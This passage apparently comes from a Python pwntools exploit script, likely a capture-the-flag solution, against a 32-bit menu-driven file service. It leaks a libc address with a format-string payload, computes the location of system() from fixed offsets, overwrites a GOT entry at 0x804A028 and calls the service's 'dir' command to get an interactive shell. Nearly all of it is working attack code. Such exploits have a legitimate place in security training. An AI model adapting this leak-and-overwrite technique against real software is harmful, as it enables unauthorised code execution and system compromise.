    R.recvuntil('>')
    R.write('put')
    R.recv()
    R.write('h'*1+'\n')
    R.recv()
    R.write('%x%x%x%x'+'\n')
    R.recv()
    R.write('get'+'\n')
    R.recv()
    R.write('h'+'\n')
    s=R.recv()
    libc=int(s[8:16],16)
    sys=libc-0xb7e8683b+0xb7e56190
    print '#####sys:%x'%(sys+i)
    print '###test %d'%i
    R.recvuntil('>')
    R.write('dir')
    R.recvuntil('>')
    setvalue(0x804A028,sys)
    R.write('put')
    R.write('/b\n')
    R.recv()
    R.write('a\n')
    R.recv()
    R.write('dir')
    R.interactive()
    R.close()
